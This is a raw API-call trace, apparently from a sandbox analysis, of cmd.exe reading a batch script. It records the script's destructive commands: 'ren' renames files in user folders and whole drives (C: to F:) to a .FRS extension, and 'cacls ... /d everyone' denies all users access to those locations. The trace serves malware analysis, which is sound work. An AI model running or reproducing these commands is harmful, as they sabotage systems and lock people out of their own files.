_get_osfhandle (_FileHandle=3) returned 0x2b8 [0138.486] GetFileType (hFile=0x2b8) returned 0x1 [0138.486] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf7 [0138.486] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0138.486] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=292, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x124 [0138.486] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=45, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Links\\*.*\" *.*.FRS\r\n.FRS\r\n") returned 45 [0138.486] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x124 [0138.486] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0138.486] GetFileType (hFile=0x2b8) returned 0x1 [0138.486] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x124 [0138.486] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0138.486] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=341, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x155 [0138.486] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=49, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Favorites\\*.*\" *.*.FRS\r\n\r\n") returned 49 [0138.486] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x155 [0138.486] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0138.486] GetFileType (hFile=0x2b8) returned 0x1 [0138.486] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x155 [0138.486] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0138.486] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=389, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x185 [0138.486] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=48, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Searches\\*.*\" *.*.FRS\r\n\n") returned 48 [0138.486] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x185 [0138.486] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0138.486] GetFileType (hFile=0x2b8) returned 0x1 [0138.486] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x185 [0138.486] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0138.486] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=435, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1b3 [0138.486] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=46, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Videos\\*.*\" *.*.FRS\r\n\r\n") returned 46 [0138.486] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1b3 [0138.487] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0138.487] GetFileType (hFile=0x2b8) returned 0x1 [0138.487] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1b3 [0138.487] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0138.487] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=483, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1e3 [0138.487] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=48, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Pictures\\*.*\" *.*.FRS\r\n") returned 48 [0138.487] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1e3 [0138.487] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0138.487] GetFileType (hFile=0x2b8) returned 0x1 [0138.487] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1e3 [0138.487] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0138.487] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=518, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x206 [0138.487] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\Public\\*.*\" *.*.FRS\r\n.*\" *.*.FRS\r\n") returned 35 [0138.487] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x206 [0138.487] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0138.487] GetFileType (hFile=0x2b8) returned 0x1 [0138.487] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x206 [0138.487] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0138.487] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=540, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x21c [0138.487] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\*.*\" *.*.FRS\r\n.*\" *.*.FRS\r\n") returned 22 [0138.487] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x21c [0138.487] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0138.487] GetFileType (hFile=0x2b8) returned 0x1 [0138.487] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x21c [0138.487] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0138.487] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=562, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x232 [0138.487] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"D:\\*.*\" *.*.FRS\r\n") returned 22 [0138.487] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x232 [0138.487] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0138.487] GetFileType (hFile=0x2b8) returned 0x1 [0138.487] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x232 [0138.488] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0138.488] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=584, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x248 [0138.488] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"E:\\*.*\" *.*.FRS\r\n") returned 22 [0138.488] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x248 [0138.488] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0138.488] GetFileType (hFile=0x2b8) returned 0x1 [0138.488] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x248 [0138.488] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0138.488] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=606, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x25e [0138.488] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"F:\\*.*\" *.*.FRS\r\n") returned 22 [0138.488] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x25e [0138.488] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0138.488] GetFileType (hFile=0x2b8) returned 0x1 [0138.488] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x25e [0138.488] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0138.488] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=669, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x29d [0138.488] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=63, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Desktop\\*.*\" /e /d everyone\r\net n=%%i\r\n") returned 63 [0138.488] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x29d [0138.488] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0138.488] GetFileType (hFile=0x2b8) returned 0x1 [0138.488] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x29d [0138.488] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0138.488] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=736, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2e0 [0138.488] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=67, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Saved Games\\*.*\" /e /d everyone\r\n=%%i\r\n") returned 67 [0138.488] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2e0 [0138.488] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0138.488] GetFileType (hFile=0x2b8) returned 0x1 [0138.488] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2e0 [0138.488] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0138.489] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=797, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x31d [0138.489] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=61, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Links\\*.*\" /e /d everyone\r\nyone\r\n") returned 61 [0138.489] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x31d [0138.489] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0138.489] GetFileType (hFile=0x2b8) returned 0x1 [0138.489] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x31d [0138.489] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0138.489] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=862, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x35e [0138.489] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=65, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Favorites\\*.*\" /e /d everyone\r\n\r\n") returned 65 [0138.489] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x35e [0138.489] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0138.489] GetFileType (hFile=0x2b8) returned 0x1 [0138.489] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x35e [0138.489] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0138.489] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=926, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x39e [0138.489] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=64, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Searches\\*.*\" /e /d everyone\r\n\n") returned 64 [0138.489] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x39e [0138.489] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0138.489] GetFileType (hFile=0x2b8) returned 0x1 [0138.489] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x39e [0138.489] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0138.489] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=988, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3dc [0138.489] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=62, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Videos\\*.*\" /e /d everyone\r\n\r\n") returned 62 [0138.489] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3dc [0138.489] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0138.489] GetFileType (hFile=0x2b8) returned 0x1 [0138.489] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3dc [0138.489] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0138.489] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=1052, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x41c [0138.489] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=64, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Pictures\\*.*\" /e /d everyone\r\n") returned 64 [0138.490] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x41c [0138.490] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0138.490] GetFileType (hFile=0x2b8) returned 0x1 [0138.490] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x41c [0138.490] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0138.490] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=1103, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x44f [0138.490] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=51, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\Public\\*.*\" /e /d everyone\r\n/d everyone\r\n") returned 51 [0138.490] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x44f [0138.490] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0138.490] GetFileType (hFile=0x2b8) returned 0x1 [0138.490] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x44f [0138.490] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0138.490] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=1155, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x483 [0138.490] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=52, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Program Files\\*.*\" /e /d everyone\r\nd everyone\r\n") returned 52 [0138.490] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x483 [0138.490] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0138.490] GetFileType (hFile=0x2b8) returned 0x1 [0138.490] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x483 [0138.490] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0138.490] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=1193, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4a9 [0138.490] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\*.*\" /e /d everyone\r\n /d everyone\r\n") returned 38 [0138.490] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4a9 [0138.490] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0138.490] GetFileType (hFile=0x2b8) returned 0x1 [0138.490] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4a9 [0138.490] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0138.490] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=1231, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4cf [0138.490] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"D:\\*.*\" /e /d everyone\r\n") returned 38 [0138.490] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4cf [0138.490] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0138.491] GetFileType (hFile=0x2b8) returned 0x1 [0138.491] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4cf [0138.491] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0138.491] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=1269, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4f5 [0138.491] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"E:\\*.*\" /e /d everyone\r\n") returned 38 [0138.491] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4f5 [0138.491] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0138.491] GetFileType (hFile=0x2b8) returned 0x1 [0138.491] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4f5 [0138.491] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0138.491] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=1307, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x51b [0138.491] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"F:\\*.*\" /e /d everyone\r\n") returned 38 [0138.491] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: 